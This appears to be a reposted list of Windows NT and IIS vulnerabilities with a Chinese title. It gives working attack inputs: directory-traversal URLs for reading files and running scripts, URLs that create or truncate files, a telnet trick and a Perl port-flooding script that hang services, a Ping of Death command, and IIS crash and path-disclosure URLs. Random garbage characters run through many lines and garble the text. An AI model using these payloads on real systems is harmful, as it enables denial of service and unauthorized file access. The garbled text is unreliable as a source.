NT的漏洞及描述(英文）

受影响系统:4.0,iis 1.0
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
* t, ~2 Y# _: Q4 N
A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
1 R  n% v+ a# {2 P( W  ^
( i2 y/ ^3 h& n# W4 iBy default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

--------------------------------------------------------------------

  g7 t0 J' p0 h/ d. m# M' G受影响系统:4.0
# `! @( m% b  a! VA URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
6 \% ]! M, U! I- g" n( k, ~
If the file 'target.bat' exists, the file will be truncated.

  A6 s# g7 s! G) N% z
A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.
& @$ N, L0 U& d# T% V2 {
----------------------------------------------------------------------
) _* B9 R6 `- t$ ^, D5 Y9 j
, u# D" [0 j/ N  m9 W受影响系统:3.51,4.0
6 }- z; N- m# b9 p$ R7 a* aMultiple service ports (53, 135, 1031) are vunerable to 'confusion'.
# ~  {- E% s* k& }1 B+ m, H
The following steps;

Telnet to an NT 4.0 system on port 135
8 B, w3 `. o7 p8 q$ G$ fType about 10 characters followed by a <CR>
1 g$ x- m( [/ lExit Telnet
0 s8 D$ G8 v% _7 R) Wresults in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
7 q; m' U# v" }2 |5 [
When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.

The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.
3 ~$ m# c( c) S( ~# h6 k
If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):
6 {6 x( f8 X7 `# e" v; C' Q
9 J6 m& L% k' \% V6 a/*begin poke code*/
% X3 O8 O( ]8 g+ \
use Socket;
use FileHandle;
  W4 `1 W& u- K/ P- ?7 \require "chat2.pl";

! `7 g' a9 a. d! p' c5 q3 C$systemname = $ARGV[0] && shift;

) O7 w* U, O1 l3 d/ a/ {5 `, g7 P$verbose = 1; # tell me what you're hitting
( d, F& p" b* u3 y, K$knownports = 1; # don't hit known problem ports
8 F2 s5 x4 C  ]/ ?0 |4 {for ($port = $0; $port<65535; $port++)
{
! L) F& q& S$ ^* Y% v* j' A8 H+ B

( t: k" J  V8 V1 c9 Oif ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
! j3 c' }7 W7 a/ J8 v9 {- anext;
& g8 d  q7 U3 ], d/ o* M4 |}
2 [! q4 [# v3 ?% B$fh = chat::open_port($systemname, $port);
9 F; c$ N6 ]$ f9 C! m% M; Vchat::print ($fh,"This is about ten characters or more");
4 X$ F/ R' K$ r3 Y# i# \if ($verbose) {
print "Trying port: $port\n";
}
; q* ?" j* G" i! I2 u8 q3 G# [: o6 pchat::close($fh);

5 V$ a2 \5 f" v/ O! G}
- ?# k/ W4 U, \- e# o
& |3 Z/ U: w* X
* |: J! {, \$ u6 P) Z. {/*end poke code*/
, g: x* J* ~8 M) s' R
0 P/ z; J' k; fSave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername
1 u0 g( Z9 z3 W, ?. z
--------------------------------------------------------------------------------
: Y! X3 z7 ?/ Y: c- _
- |+ T: @3 G' I: z! U/ j受影响系统:4.0
$ X) ^! j6 O! d" xUsing a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.

This attack causes Dr. Watson to display an alert window and to log an error:

% e" R4 \- q5 T"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
' Y' X" b  s# _4 }8 g6 ]
! ^2 R" a; P0 B" A/ @$ K5 ?--------------------------------------------------------------------------------

受影响系统:3.51,4.0
Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:

STOP: 0X0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS
4 D) u- Q3 t7 N  J& k
-OR-
- {% P/ f1 d$ t& ^" r1 `( I
& \% |3 y& ?8 m! vSTOP: 0x0000000A
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS
8 t* Y0 |1 x4 S8 S8 m
" b& Z$ J  e3 B  PNT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.

( W7 ^4 ?% g  i4 c$ d--------------------------------------------------------------------------------
9 M# U8 F  \% ^
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).

5 v6 D3 n5 M( w# V; S--------------------------------------------------------
; [+ j! W+ o8 L& Y  `6 B. b
7 a* k/ G4 ?- RIIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server